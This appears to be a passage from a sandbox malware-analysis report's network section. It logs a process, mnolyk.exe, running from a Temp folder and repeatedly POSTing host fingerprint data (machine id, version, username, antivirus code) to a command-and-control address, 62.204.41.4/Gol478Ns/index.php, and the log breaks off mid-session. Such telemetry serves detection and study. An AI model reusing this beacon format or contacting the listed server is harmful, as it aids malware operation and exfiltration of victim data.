                                                                      125 | 192.168.2.7 | 49851 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:29.678141117 CET | 570 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.742813110 CET | 571 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      126 | 192.168.2.7 | 49852 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:29.914060116 CET | 571 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.976921082 CET | 572 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      127 | 192.168.2.7 | 49853 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:30.146488905 CET | 572 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.211244106 CET | 573 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      128 | 192.168.2.7 | 49854 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:30.381462097 CET | 573 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.445030928 CET | 574 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      129 | 192.168.2.7 | 49855 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:30.616175890 CET | 574 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.680810928 CET | 575 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      13 | 192.168.2.7 | 49737 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:00.769093990 CET | 445 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.832873106 CET | 445 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      130 | 192.168.2.7 | 49856 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:30.850297928 CET | 575 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.912975073 CET | 576 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      131 | 192.168.2.7 | 49857 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:31.085634947 CET | 576 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.152002096 CET | 577 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      132 | 192.168.2.7 | 49858 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:31.320590019 CET | 577 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.384737968 CET | 578 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      133 | 192.168.2.7 | 49859 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:31.553133011 CET | 578 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.617983103 CET | 579 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      134 | 192.168.2.7 | 49860 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:31.786990881 CET | 579 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.851413012 CET | 580 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      135 | 192.168.2.7 | 49861 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:32.032216072 CET | 580 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.098774910 CET | 581 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      136 | 192.168.2.7 | 49862 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:32.276209116 CET | 581 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.340869904 CET | 582 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      137 | 192.168.2.7 | 49863 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:32.512022972 CET | 582 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.576287985 CET | 583 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      138 | 192.168.2.7 | 49864 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:32.756227970 CET | 583 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.819240093 CET | 584 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      139 | 192.168.2.7 | 49865 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:32.990534067 CET | 584 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.054577112 CET | 585 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      14 | 192.168.2.7 | 49738 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:01.020544052 CET | 446 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.085381031 CET | 446 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      140 | 192.168.2.7 | 49866 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:33.225481033 CET | 585 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.287621021 CET | 586 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      141 | 192.168.2.7 | 49867 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:33.500442982 CET | 586 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.564363956 CET | 587 | IN | HTTP/1.1 200 OK
